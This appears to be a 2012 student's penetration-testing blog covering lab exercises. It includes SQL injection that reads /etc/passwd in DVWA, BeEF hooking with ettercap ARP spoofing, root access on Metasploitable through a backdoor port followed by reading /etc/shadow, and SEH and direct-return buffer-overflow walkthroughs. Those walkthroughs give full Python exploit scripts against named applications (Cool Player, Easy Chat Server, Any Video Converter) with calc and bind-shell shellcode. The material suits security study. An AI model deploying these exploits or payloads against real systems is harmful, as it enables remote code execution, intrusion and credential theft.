=======================================================

Friday, October 26, 2012

COMPUTER FORENSIC -- INTRODUCTION


1.  Computer Forensic is a branch of digital forensic ( the forensic science includes recovery and investigation of material in digital device) to examine digital media with the goal: identifying, preserving, recovering, analyzing and presenting facts and opinions about the information.



2.   Slack space refers to partions of a hard drive that are not fully used by the current allocated file and which may contain data from a previously deleted file.


3. Unallocated space is a cluster of storage media partition that is not used to save the current of active file. Can occur when delete partition (may be with the data because contain not fully erase).


4. Example command on Computer Forensic :
    ==> dd if=source of=destination
    ==> cfdisk -l
    ==> fdisk /dev/sd....
    ==> ls<dev> --> Ex: lsusb

Monday, October 22, 2012

DVWA ( MEDIUM ) : SQLI

Try to pentest on dvwa with medium level security. I use sql injection to see list off user on target :
==> Open burpsuite and intecept on
==> I use parameter 1 or 1=1
==> If have intercepted --> send to reperter
==> In sql injection i use parameter --> 1+union+select+null,load_file(0xascii etc/passwd)--+-
==> I get decode /etc/passwd -->  2f6574632f7061737377640a


==> I get list of system on repeter with parameter :  
         --> 1+union+select+null,load_file(0x2f6574632f7061737377640a)--+-


==> This is list which i got :


==> I use ssh and compare rsa key.

==> But i don't get match key.


Using file inclusion

==> we can see user on system like  root , msfadmin, user etc.....



Friday, October 19, 2012

BEEF & ETTERCAP

Beef is a framework with web base which utilize vunerable of browser.
==> VA ==> SET ==> BEEF

==> http://192.168.56.1:3000/beef.html ( with hook.js inside ).

example:
==> Access html with hook js.


==> Effect of hook js.



Using ettercap to redirect all request to hook js
==> clone web localhost hook contain with SET



==> ettercap -T -q -i vboxnet0 -M arp // //


==> if proccess have sessions, it possible to remote / meterpreter with ==>  session -l  ==> session -i 1
==> but its no have session.



=======================================================================
=======================================================================

Wednesday, October 17, 2012

Looking for Vulnerability of Metasploitable

In the section, i examine metasploitable on Vbox to see possibility which made vulnerable. Ok, lets go my virtu lab and finish the job.

1. Information Gathering
    Scan Host
   
==> I get life host --> a) 192.168.56.1 ( my host )
                                   b) 192.168.56.100 ( gateway )
                                   c)  192.168.56.102 ( metasploitable host )

2. Sevice Enumeration
    Looking for running service on ==> 192.168.56.101

   
==> I get some running service.

3. Vulnerable Assesment
     Looking for vulnerable possibility.
     ==> Nessus

    ==> I got some information about risk running service.
    ==> See on picture above, i see backdoor on port 1524.

   
4. Exploit/Pentest
   ==> telnet < host > <port>
   ==> telnet 192.168.56.102 1524


  ==> I got the root
  ==> Looking for other user with ==> cat /etc/shadow


  ==> Hash with John



Back view on VA for other way pentest.
==> I see mysql service with default configure.


==> I can login with no password ==> mysql -h 192.168.56.101

=================================================================================
=================================================================================

Friday, October 12, 2012

POP POP RETN

Why POP POP RETN used on SEH exploitation?

Because POP POP RETN is a sequence of instructions needed in order to create SEH (Structured Exception Handler) exploits. 

In the process command of POP POP RETN :
Each time a POP command running 1 time, ESP is moved towards higher addresses by one position (1 position = 4 bytes for a 32-bit architecture). Each time a RET occurs, the contents of the address ESP points at are put in EIP and executed.

So, we need to escape from SEHandler with POP POP RETN.
1. POP (first) ==> Pointer next SEH record
2. POP ( second ) ==> Pointer to Exception Handler
3. RETN ==> contents of the address ESP points at are put in EIP and executed.

Monday, October 8, 2012

BUFFER OVERFLOW ( LOCAL) Direct RETN: Cool Player+Portable 2.19.2

Nice to meet you again, let's to see another aplication fuzzing with BOF method. Aplication which will trial is Cool Player+Portable 2.19.2 . Go to the job :

1. Look possibility to make aplication crash ( i have try it ).
    a.  Playlist
         => m3u ( not require header )
         => pls ( need header )
   
    
2. In this section i try using playlist with .pls extention.
    ==> pls header
             [Playlist]
             NumberOfEntries=<count>
             File1=path
             File-n=path

    ==> To see format above, you can save playlist from cool player and see in
             text editor

3. Create fuzzer script and running.


4. Load file cheat.pls on Cool Player see the effect.


     ==> Aplication Crash.

5. Load again and see the effect with ollydbg



6. Modify junk with pattern offset to look offset position






7. Load again pls file and see the pattern position.

    ==> Looking for pattern.

   
8.  Jump ESP address.

    
    ==> JUMP ESP address --> 7E455313 ==> \x13\x53\x45\xFE

I try but not overwrite EIP.

9. Now i use .m3u playlist format ( no header ).
10.  Value which resulted is same ( pattern offset --> 224 ).
11. I use JMP ESP address ==> \xC3\xB4\xA4\x7C
12. Create Fuzzer with calc shellcode.


#!/usr/bin/python
file="attack.pls"
#buffer="[Playlist]\n"     #11bit
#buffer+="NumberOfEntries=1\n"  #18bit
#buffer+="File1="  #6bit
#junk="\x90"*224
junk="\x90"*224
junk+="\xC3\xB4\xA4\x7C"
junk+="\x90"*8
#calc.exe
junk+=("\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3e"
"\xde\x4c\x12\x83\xeb\xfc\xe2\xf4\xc2\x36\x08\x12\x3e\xde\xc7\x57"
"\x02\x55\x30\x17\x46\xdf\xa3\x99\x71\xc6\xc7\x4d\x1e\xdf\xa7\x5b"
"\xb5\xea\xc7\x13\xd0\xef\x8c\x8b\x92\x5a\x8c\x66\x39\x1f\x86\x1f"
"\x3f\x1c\xa7\xe6\x05\x8a\x68\x16\x4b\x3b\xc7\x4d\x1a\xdf\xa7\x74"
"\xb5\xd2\x07\x99\x61\xc2\x4d\xf9\xb5\xc2\xc7\x13\xd5\x57\x10\x36"
"\x3a\x1d\x7d\xd2\x5a\x55\x0c\x22\xbb\x1e\x34\x1e\xb5\x9e\x40\x99"
"\x4e\xc2\xe1\x99\x56\xd6\xa7\x1b\xb5\x5e\xfc\x12\x3e\xde\xc7\x7a"
"\x02\x81\x7d\xe4\x5e\x88\xc5\xea\xbd\x1e\x37\x42\x56\xa0\x94\xf0"
"\x4d\xb6\xd4\xec\xb4\xd0\x1b\xed\xd9\xbd\x2d\x7e\x5d\xde\x4c\x12")
fuzzer=(buffer+junk)
f=open(file,'w')
print "File Made: ", len(fuzzer)
f.write(fuzzer)
print "Yes....!",file, "Succes Made"
f.close()


13 . Execute Fuzzer file with shellcode contain.


14. Modify fusser with bind shell shellcode

"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc0" "\x13\x47\x6f\x83\xeb\xfc\xe2\xf4\x3c\x79\xac\x22\x28\xea\xb8\x90" "\x3f\x73\xcc\x03\xe4\x37\xcc\x2a\xfc\x98\x3b\x6a\xb8\x12\xa8\xe4" "\x8f\x0b\xcc\x30\xe0\x12\xac\x26\x4b\x27\xcc\x6e\x2e\x22\x87\xf6" "\x6c\x97\x87\x1b\xc7\xd2\x8d\x62\xc1\xd1\xac\x9b\xfb\x47\x63\x47" "\xb5\xf6\xcc\x30\xe4\x12\xac\x09\x4b\x1f\x0c\xe4\x9f\x0f\x46\x84" "\xc3\x3f\xcc\xe6\xac\x37\x5b\x0e\x03\x22\x9c\x0b\x4b\x50\x77\xe4" "\x80\x1f\xcc\x1f\xdc\xbe\xcc\x2f\xc8\x4d\x2f\xe1\x8e\x1d\xab\x3f" "\x3f\xc5\x21\x3c\xa6\x7b\x74\x5d\xa8\x64\x34\x5d\x9f\x47\xb8\xbf" "\xa8\xd8\xaa\x93\xfb\x43\xb8\xb9\x9f\x9a\xa2\x09\x41\xfe\x4f\x6d" "\x95\x79\x45\x90\x10\x7b\x9e\x66\x35\xbe\x10\x90\x16\x40\x14\x3c" "\x93\x40\x04\x3c\x83\x40\xb8\xbf\xa6\x7b\x56\x33\xa6\x40\xce\x8e" "\x55\x7b\xe3\x75\xb0\xd4\x10\x90\x16\x79\x57\x3e\x95\xec\x97\x07" "\x64\xbe\x69\x86\x97\xec\x91\x3c\x95\xec\x97\x07\x25\x5a\xc1\x26" "\x97\xec\x91\x3f\x94\x47\x12\x90\x10\x80\x2f\x88\xb9\xd5\x3e\x38" "\x3f\xc5\x12\x90\x10\x75\x2d\x0b\xa6\x7b\x24\x02\x49\xf6\x2d\x3f" "\x99\x3a\x8b\xe6\x27\x79\x03\xe6\x22\x22\x87\x9c\x6a\xed\x05\x42" "\x3e\x51\x6b\xfc\x4d\x69\x7f\xc4\x6b\xb8\x2f\x1d\x3e\xa0\x51\x90" "\xb5\x57\xb8\xb9\x9b\x44\x15\x3e\x91\x42\x2d\x6e\x91\x42\x12\x3e" "\x3f\xc3\x2f\xc2\x19\x16\x89\x3c\x3f\xc5\x2d\x90\x3f\x24\xb8\xbf" "\x4b\x44\xbb\xec\x04\x77\xb8\xb9\x92\xec\x97\x07\x2f\xdd\xa7\x0f" "\x93\xec\x91\x90\x10\x13\x47\x6f"

15. Try to telnet

I can't do anything after telnet because telnet not enter perfectly.
I see in dump on stack no space to landing shellcode.

=================================================================================
=================================================================================

BUFFER OVERFLOW ( remote ) SEH: Easy Chat Server 2.2

Oke, now i try fuzzing easy chat server 2.2 with remote method. Let's complete the task :

1. Observation Aplication easy chat server.

     ==> Registration Form

    ==> IP dan port which uses ==> 192.168.56.101:80/443
     ==>User who have created.
   ==> Chat room and the rules.

    ==> Accessed by IP address 192.168.56.101 ( default http port 80 ).





   ==> Enter Fisrt Chat Room ==> only this room allow guest user login.


   ** Look the url  to get clue:  http://192.168.56.101/chat.ghp?username=guest&password=&room=1&sex=1

2. Looking for header for create fuzzer.
    ==> Capture trafic with wireshark.
    ==> Login with guest user and analyse the captured traffic on wireshark.

     ==> Lets see the header on same with url above:
           GET /chat.ghp?username=guest&password=&room=1&sex=1 HTTP/1.1


2. Create Fuzzer with header above.

#!/usr/bin/python
import socket

target_address="192.168.56.101"
target_port=80
buffer="\x41"*5000
payload=("GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=1 HTTP/1.1 \r\n\r\n")
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
#sock.send("GET /" + buffer + "HTTP/1.1\r\n")
sock.send(payload)
print("kirim")
sock.close()


3. Running fuzzer and see impact with ollydbg.

   ==> View SEH  chain contain 41414141 ==> Shift + F9


     ==> EIP overwrited.

 4. Create pattern to look offset position.

     ==> Effect of fuzzer with pattern.

     ==> EIP overwrited 68413368
     ==> Cek pattern offset.


    ==> Pattern offset potition ==> 220

 5. Looking for third party .dll module to get POP POP RETN

     ==> There are two module from easy chat which can use libeay32.dll or
              ssleay32.dll
     ==>I use ssleay because not contain 00 char.

    ==> POP POP RETN address ==> 10013814 ==> \x14\x38\x01\x10
    ==> nonseh ==> \xeb\08\x90\x90

 6. Modify Fuzzer with structure: nop+nseh+seh
     
#!/usr/bin/python
import socket

target_address="192.168.56.101"
target_port=80
buffer="\x90"*216
buffer+="\xeb\x08\x90\x90"
buffer+="\x58\x07\x01\x10"
buffer+="\x90"*500
buffer+="\x90"*(2000-len(buffer))
#buffer+="\xCC\xCC\xCC\xCC"
#buffer+="\x6D\x1D\x90\x7C"
payload=("GET /chat.ghp?username="+buffer+"&password=123&room=1 HTTP/1.1\r\n\r\n")
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
#sock.send("GET /" + buffer + "HTTP/1.1\r\n")
sock.send(payload)
print("kirim")
sock.close()







==> Result true==> ssleay32



    

 7. Generate shellcode with msfweb.
     ==> Bad Char==> x20


    ==> Generate Payload

/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char scode[] = "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x64" "\xd5\xde\xe8\x83\xeb\xfc\xe2\xf4\x98\xbf\x35\xa5\x8c\x2c\x21\x17" "\x9b\xb5\x55\x84\x40\xf1\x55\xad\x58\x5e\xa2\xed\x1c\xd4\x31\x63" "\x2b\xcd\x55\xb7\x44\xd4\x35\xa1\xef\xe1\x55\xe9\x8a\xe4\x1e\x71" "\xc8\x51\x1e\x9c\x63\x14\x14\xe5\x65\x17\x35\x1c\x5f\x81\xfa\xc0" "\x11\x30\x55\xb7\x40\xd4\x35\x8e\xef\xd9\x95\x63\x3b\xc9\xdf\x03" "\x67\xf9\x55\x61\x08\xf1\xc2\x89\xa7\xe4\x05\x8c\xef\x96\xee\x63" "\x24\xd9\x55\x98\x78\x78\x55\xa8\x6c\x8b\xb6\x66\x2a\xdb\x32\xb8" "\x9b\x03\xb8\xbb\x02\xbd\xed\xda\x0c\xa2\xad\xda\x3b\x81\x21\x38" "\x0c\x1e\x33\x14\x5f\x85\x21\x3e\x3b\x5c\x3b\x8e\xe5\x38\xd6\xea" "\x31\xbf\xdc\x17\xb4\xbd\x07\xe1\x91\x78\x89\x17\xb2\x86\x8d\xbb" "\x37\x86\x9d\xbb\x27\x86\x21\x38\x02\xbd\xcf\xb4\x02\x86\x57\x09" "\xf1\xbd\x7a\xf2\x14\x12\x89\x17\xb2\xbf\xce\xb9\x31\x2a\x0e\x80" "\xc0\x78\xf0\x01\x33\x2a\x08\xbb\x31\x2a\x0e\x80\x81\x9c\x58\xa1" "\x33\x2a\x08\xb8\x30\x81\x8b\x17\xb4\x46\xb6\x0f\x1d\x13\xa7\xbf" "\x9b\x03\x8b\x17\xb4\xb3\xb4\x8c\x02\xbd\xbd\x85\xed\x30\xb4\xb8" "\x3d\xfc\x12\x61\x83\xbf\x9a\x61\x86\xe4\x1e\x1b\xce\x2b\x9c\xc5" "\x9a\x97\xf2\x7b\xe9\xaf\xe6\x43\xcf\x7e\xb6\x9a\x9a\x66\xc8\x17" "\x11\x91\x21\x3e\x3f\x82\x8c\xb9\x35\x84\xb4\xe9\x35\x84\x8b\xb9" "\x9b\x05\xb6\x45\xbd\xd0\x10\xbb\x9b\x03\xb4\x17\x9b\xe2\x21\x38" "\xef\x82\x22\x6b\xa0\xb1\x21\x3e\x36\x2a\x0e\x80\x94\x5f\xda\xb7" "\x37\x2a\x08\x17\xb4\xd5\xde\xe8";




 8. Modify Fuzzer with structure : nop+nseh+seh+nop+shellcode

 #!/usr/bin/python
import socket

target_address="192.168.56.101"
target_port=80
buffer="\x90"*216
buffer+="\xeb\x08\x90\x90"
buffer+="\x58\x07\x01\x10"
buffer+="\x90"*500
buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x47"
"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x57\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x42\x41\x58\x50\x38\x41\x42\x75\x5a\x49\x6b\x4c\x61"
"\x7a\x4a\x4b\x70\x4d\x4d\x38\x4a\x59\x6b\x4f\x4b\x4f\x69\x6f\x51"
"\x70\x4c\x4b\x70\x6c\x74\x64\x54\x64\x4e\x6b\x77\x35\x67\x4c\x4c"
"\x4b\x33\x4c\x37\x75\x62\x58\x35\x51\x6a\x4f\x6c\x4b\x50\x4f\x55"
"\x48\x4e\x6b\x51\x4f\x77\x50\x66\x61\x7a\x4b\x71\x59\x6e\x6b\x50"
"\x34\x6c\x4b\x65\x51\x7a\x4e\x44\x71\x6b\x70\x4f\x69\x6c\x6c\x4e"
"\x64\x79\x50\x43\x44\x53\x37\x49\x51\x6b\x7a\x56\x6d\x36\x61\x4f"
"\x32\x4a\x4b\x5a\x54\x37\x4b\x46\x34\x46\x44\x71\x38\x42\x55\x69"
"\x75\x4e\x6b\x41\x4f\x57\x54\x53\x31\x7a\x4b\x71\x76\x6c\x4b\x76"
"\x6c\x30\x4b\x4e\x6b\x41\x4f\x57\x6c\x74\x41\x7a\x4b\x35\x53\x66"
"\x4c\x6e\x6b\x4d\x59\x70\x6c\x64\x64\x65\x4c\x73\x51\x49\x53\x70"
"\x31\x6b\x6b\x75\x34\x4e\x6b\x37\x33\x30\x30\x6c\x4b\x37\x30\x44"
"\x4c\x4c\x4b\x30\x70\x37\x6c\x6c\x6d\x6e\x6b\x51\x50\x53\x38\x63"
"\x6e\x63\x58\x4c\x4e\x62\x6e\x76\x6e\x7a\x4c\x72\x70\x39\x6f\x4e"
"\x36\x61\x76\x36\x33\x43\x56\x61\x78\x45\x63\x30\x32\x51\x78\x44"
"\x37\x70\x73\x64\x72\x33\x6f\x66\x34\x39\x6f\x68\x50\x45\x38\x68"
"\x4b\x58\x6d\x59\x6c\x35\x6b\x36\x30\x6b\x4f\x78\x56\x73\x6f\x6f"
"\x79\x49\x75\x52\x46\x4c\x41\x38\x6d\x45\x58\x56\x62\x30\x55\x51"
"\x7a\x77\x72\x69\x6f\x4a\x70\x35\x38\x6b\x69\x77\x79\x49\x65\x6e"
"\x4d\x73\x67\x4b\x4f\x59\x46\x71\x43\x36\x33\x36\x33\x70\x53\x56"
"\x33\x50\x43\x72\x73\x43\x73\x33\x63\x79\x6f\x5a\x70\x62\x46\x73"
"\x58\x64\x51\x63\x6c\x55\x36\x42\x73\x6c\x49\x4b\x51\x6e\x75\x30"
"\x68\x6c\x64\x46\x7a\x42\x50\x6f\x37\x32\x77\x79\x6f\x7a\x76\x31"
"\x7a\x52\x30\x43\x61\x61\x45\x6b\x4f\x6e\x30\x35\x38\x6e\x44\x4c"
"\x6d\x74\x6e\x6d\x39\x36\x37\x6b\x4f\x4b\x66\x61\x43\x42\x75\x4b"
"\x4f\x58\x50\x75\x38\x4d\x35\x70\x49\x6c\x46\x50\x49\x53\x67\x4b"
"\x4f\x6a\x76\x46\x30\x53\x64\x62\x74\x61\x45\x6b\x4f\x4a\x70\x6f"
"\x63\x45\x38\x6b\x57\x32\x59\x59\x56\x61\x69\x73\x67\x79\x6f\x6b"
"\x66\x31\x45\x49\x6f\x38\x50\x52\x46\x52\x4a\x61\x74\x65\x36\x62"
"\x48\x51\x73\x50\x6d\x6f\x79\x6a\x45\x51\x7a\x76\x30\x42\x79\x77"
"\x59\x5a\x6c\x6f\x79\x68\x67\x73\x5a\x42\x64\x6c\x49\x4a\x42\x50"
"\x31\x6f\x30\x4b\x43\x4e\x4a\x4b\x4e\x61\x52\x56\x4d\x59\x6e\x30"
"\x42\x66\x4c\x4c\x53\x4e\x6d\x31\x6a\x50\x38\x6e\x4b\x6e\x4b\x6c"
"\x6b\x45\x38\x31\x62\x79\x6e\x4f\x43\x55\x46\x49\x6f\x72\x55\x52"
"\x64\x59\x6f\x78\x56\x33\x6b\x72\x77\x43\x62\x36\x31\x72\x71\x61"
"\x41\x62\x4a\x43\x31\x66\x31\x46\x31\x63\x65\x70\x51\x6b\x4f\x6a"
"\x70\x33\x58\x6c\x6d\x79\x49\x63\x35\x4a\x6e\x43\x63\x4b\x4f\x6e"
"\x36\x41\x7a\x39\x6f\x59\x6f\x30\x37\x79\x6f\x6e\x30\x4c\x4b\x70"
"\x57\x6b\x4c\x6c\x43\x48\x44\x71\x74\x39\x6f\x48\x56\x63\x62\x49"
"\x6f\x5a\x70\x71\x78\x6a\x50\x4c\x4a\x76\x64\x53\x6f\x73\x63\x6b"
"\x4f\x79\x46\x4b\x4f\x48\x50\x47")
buffer+="\x90"*(2000-len(buffer))
#buffer+="\xCC\xCC\xCC\xCC"
#buffer+="\x6D\x1D\x90\x7C"
payload=("GET /chat.ghp?username="+buffer+"&password=123&room=1 HTTP/1.1\r\n\r\n")
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
#sock.send("GET /" + buffer + "HTTP/1.1\r\n")
sock.send(payload)
print("kirim")

sock.close()


 9. Execute payload and telnet to 4444 port.  




===================================================================================
===================================================================================


Friday, October 5, 2012

BUFFER OVERFLOW ( LOCAL ) SEH : Any Video Converter Pro. ( 3.3.5 )

Thanks for reading my scribbles words, in this part i try to explore about Buffer Overflow SEH ( local ). I will explore Any Video Convertet Profesional (3.3.5). I Explore files which in folder program file. Let,s to journey:

**I try to change file conf on mplayer but not effect because mplayer can't play anything == always terminated if running.

**I try to modify file profiles_v2.xml with fuzzer container. This my structure: 

<root>
<categories>
<category name="all" id="0" icon="cat_all.bmp" desc="buffer">

</categories>
<groups></groups>

<profiles></profiles></root>

**In buffer i change with junk character \x41 *1000 and create fuzzer with python.

#!/usr/bin/python
fuzzfile="profiles_v2.xml"

buffer="\x41"*1000
junk = "<root>\n"
junk+= "<categories>\n"
junk+= "<category name=\"all\" id=\"0\" icon=\"cat_all.bmp\" desc=\""+buffer+"\"/>\n"
junk+= "</categories>\n"
junk+= "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(fuzzfile,"w")
file.write(junk)
print("File "+fuzzfile+" successful created ........")
file.close()


==> will be create file ==>profiles_v2.xml

**Running the fuzzer and replace file profiles_v2.xml in any vide.... dir




==> Fuzzer give an effect
 

==> SEH chain contain character 41414141


==> Shift + F9 ==> yeah... EIP overwrited with 41414141

**Create pattern and modify fuzzer , running replace again file .xml
==> see SEH chain
==> Shift + F9

** Cek pattern offset of EIP ==>316C4130 ==>332 ( offset )
** Like yesterday modify fuzzer with JUMP SHORT and dll address i use dvcapture.dll

==>  dvcapture.dll address ==> \x33\xE6\x01\x10 ( litle endian )

**Modified fuzzer

#!/usr/bin/python
fuzzfile="profiles_v2.xml"

buffer="\x90"*328
#buffer+="\xcc\xcc\xcc\xcc"
#buffer+="\x33\xE6\x01\x10"
junk = "<root>\n"
junk+= "<categories>\n"
junk+= "<category name=\"all\" id=\"0\" icon=\"cat_all.bmp\" desc=\""+buffer+"\"/>\n"
junk+= "</categories>\n"
junk+= "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(fuzzfile,"w")
file.write(junk)
print("File "+fuzzfile+" successful created ........")
file.close()



** generate shellcode and modify fuzzer and repalce again file .xml with newest .xml fuzzer file.

"\xb8\xb8\x0c\x2f\x1f\x2b\xc9\xdb\xc1\xd9\x74\x24\xf4\xb1\x51\x5a"
"\x31\x42\x10\x03\x42\x10\x83\x7a\x08\xcd\xea\x86\x7b\xfa\x58\x9e"
"\x85\x03\x9d\xa1\x16\x77\x0e\x79\xf3\x0c\x8a\xbd\x70\x6e\x10\xc5"
"\x87\x60\x91\x7a\x90\xf5\xf9\xa4\xa1\xe2\x4f\x2f\x95\x7f\x4e\xc1"
"\xe7\xbf\xc8\xb1\x8c\x80\x9f\xce\x4d\xca\x6d\xd1\x8f\x20\x99\xea"
"\x5b\x93\x4a\x79\x81\x50\xd5\xa5\x48\x8c\x8c\x2e\x46\x19\xda\x6f"
"\x4b\x9c\x37\x8c\x5f\x15\x4e\xfe\xbb\x35\x30\x3d\xf2\x9e\xd6\x4a"
"\xb6\x10\x9c\x0c\x35\xda\xd2\x90\xe8\x57\x52\xa0\xac\x0f\xdd\xfe"
"\x5e\x3c\xb1\x01\x88\xda\x61\x9b\x5d\x10\xb4\x0b\xe9\x25\x8a\x94"
"\x41\x35\x3a\x42\xa1\x24\x47\xa9\x65\x48\x6e\x92\x0c\x53\xe9\xad"
"\xe2\x94\xf4\xf8\x96\xa6\x07\xd2\x0f\x7e\xfe\x27\x62\xd7\xfe\x11"
"\x2e\x8b\x53\xce\x82\x68\x07\xb3\x77\x90\x77\x55\x10\x7f\x24\xff"
"\xb3\xf6\x35\x6a\x5b\xad\xac\xe4\x5b\xfa\x2f\xd2\x0e\x15\x81\x8f"
"\x31\xc5\x49\x8b\x63\xc8\x60\x84\x84\xc3\x20\x7f\x84\x3c\xae\x9a"
"\x33\x3b\x66\x33\x3b\x95\x29\xef\x97\x4f\x35\xdf\x8b\x18\x2e\xa6"
"\x6d\xa1\xe7\xa7\xa4\x07\xf7\x87\x2f\xc2\x63\x41\xd8\x71\x01\x04"
"\xfd\x1c\x89\x4f\xd7\x2c\xa0\x88\x4d\xe9\x3a\xb4\xa3\x31\xcf\x92"
"\x3a\xf3\x1d\x1c\x80\xd8\xce\x6d\x7f\x19\x5a\xc6\x2b\x31\xee\xe6"
"\x9f\xd4\xf1\x63\xa4\x27\xdb\xd0\x73\x8a\xb5\xb7\x2a\x40\x37\x66"
"\x9c\xc1\x66\x77\xce\x82\x25\x5e\xea\x9c\x65\x9f\x23\x4a\x75\xa0"
"\xfb\x74\x59\xd5\x53\x77\xd9\x2d\x3f\x78\x08\xff\x3f\x56\xdd\x0f"
"\x35\x53\x41\xbc\xb5\x8a\x82\x92"

==> bad character ==> 00 0a 0d 22 26 3e

#!/usr/bin/python
fuzzfile="profiles_v2.xml"

buffer="\x90"*328
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x33\xE6\x01\x10"
buffer+=("\xb8\xb8\x0c\x2f\x1f\x2b\xc9\xdb\xc1\xd9\x74\x24\xf4\xb1\x51\x5a"
"\x31\x42\x10\x03\x42\x10\x83\x7a\x08\xcd\xea\x86\x7b\xfa\x58\x9e"
"\x85\x03\x9d\xa1\x16\x77\x0e\x79\xf3\x0c\x8a\xbd\x70\x6e\x10\xc5"
"\x87\x60\x91\x7a\x90\xf5\xf9\xa4\xa1\xe2\x4f\x2f\x95\x7f\x4e\xc1"
"\xe7\xbf\xc8\xb1\x8c\x80\x9f\xce\x4d\xca\x6d\xd1\x8f\x20\x99\xea"
"\x5b\x93\x4a\x79\x81\x50\xd5\xa5\x48\x8c\x8c\x2e\x46\x19\xda\x6f"
"\x4b\x9c\x37\x8c\x5f\x15\x4e\xfe\xbb\x35\x30\x3d\xf2\x9e\xd6\x4a"
"\xb6\x10\x9c\x0c\x35\xda\xd2\x90\xe8\x57\x52\xa0\xac\x0f\xdd\xfe"
"\x5e\x3c\xb1\x01\x88\xda\x61\x9b\x5d\x10\xb4\x0b\xe9\x25\x8a\x94"
"\x41\x35\x3a\x42\xa1\x24\x47\xa9\x65\x48\x6e\x92\x0c\x53\xe9\xad"
"\xe2\x94\xf4\xf8\x96\xa6\x07\xd2\x0f\x7e\xfe\x27\x62\xd7\xfe\x11"
"\x2e\x8b\x53\xce\x82\x68\x07\xb3\x77\x90\x77\x55\x10\x7f\x24\xff"
"\xb3\xf6\x35\x6a\x5b\xad\xac\xe4\x5b\xfa\x2f\xd2\x0e\x15\x81\x8f"
"\x31\xc5\x49\x8b\x63\xc8\x60\x84\x84\xc3\x20\x7f\x84\x3c\xae\x9a"
"\x33\x3b\x66\x33\x3b\x95\x29\xef\x97\x4f\x35\xdf\x8b\x18\x2e\xa6"
"\x6d\xa1\xe7\xa7\xa4\x07\xf7\x87\x2f\xc2\x63\x41\xd8\x71\x01\x04"
"\xfd\x1c\x89\x4f\xd7\x2c\xa0\x88\x4d\xe9\x3a\xb4\xa3\x31\xcf\x92"
"\x3a\xf3\x1d\x1c\x80\xd8\xce\x6d\x7f\x19\x5a\xc6\x2b\x31\xee\xe6"
"\x9f\xd4\xf1\x63\xa4\x27\xdb\xd0\x73\x8a\xb5\xb7\x2a\x40\x37\x66"
"\x9c\xc1\x66\x77\xce\x82\x25\x5e\xea\x9c\x65\x9f\x23\x4a\x75\xa0"
"\xfb\x74\x59\xd5\x53\x77\xd9\x2d\x3f\x78\x08\xff\x3f\x56\xdd\x0f"
"\x35\x53\x41\xbc\xb5\x8a\x82\x92")
junk = "<root>\n"
junk+= "<categories>\n"
junk+= "<category name=\"all\" id=\"0\" icon=\"cat_all.bmp\" desc=\""+buffer+"\"/>\n"
junk+= "</categories>\n"
junk+= "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(fuzzfile,"w")
file.write(junk)
print("File "+fuzzfile+" successful created ........")
file.close()


** Execute program with .xml payload contain




== DONE ==

===================================================================================
===================================================================================

==========================================================================
==========================================================================

IIIIIIIIII SSSSSSSSSSSSSSS 222222222222222 CCCCCCCCCCCCC
I::::::::I SS:::::::::::::::S2:::::::::::::::22 CCC::::::::::::C
I::::::::IS:::::SSSSSS::::::S2::::::222222:::::2 CC:::::::::::::::C
II::::::IIS:::::S SSSSSSS2222222 2:::::2 C:::::CCCCCCCC::::C
I::::I S:::::S 2:::::2 C:::::C CCCCCC
I::::I S:::::S 2:::::2C:::::C
I::::I S::::SSSS 2222::::2 C:::::C
I::::I SS::::::SSSSS 22222::::::22 C:::::C
I::::I SSS::::::::SS 22::::::::222 C:::::C
I::::I SSSSSS::::S 2:::::22222 C:::::C
I::::I S:::::S2:::::2 C:::::C
I::::I S:::::S2:::::2 C:::::C CCCCCC
II::::::IISSSSSSS S:::::S2:::::2 222222 C:::::CCCCCCCC::::C
I::::::::IS::::::SSSSSS:::::S2::::::2222222:::::2 CC:::::::::::::::C
I::::::::IS:::::::::::::::SS 2::::::::::::::::::2 CCC::::::::::::C
IIIIIIIIII SSSSSSSSSSSSSSS 22222222222222222222 CCCCCCCCCCCCC

==========================================================================
==========================================================================

My Classmate


==========================================================================
( ) ) ( ( (
* ) )\ ) ( /( ( /( ( )\ ) )\ ) )\ )
` ) /((()/( )\()) )\()) )\ (()/((()/( ( (()/(
( )(_))/(_))((_)\ ((_)\((((_)( /(_))/(_)) )\ /(_))
(_(_())(_)) __ ((_) _((_))\ _ )\ (_)) (_))_ ((_) (_))
|_ _|| _ \\ \ / / | || |(_)_\(_)| _ \ | \ | __|| _ \
| | | / \ V / | __ | / _ \ | / | |) || _| | /
|_| |_|_\ |_| |_||_|/_/ \_\ |_|_\ |___/ |___||_|_\

==========================================================================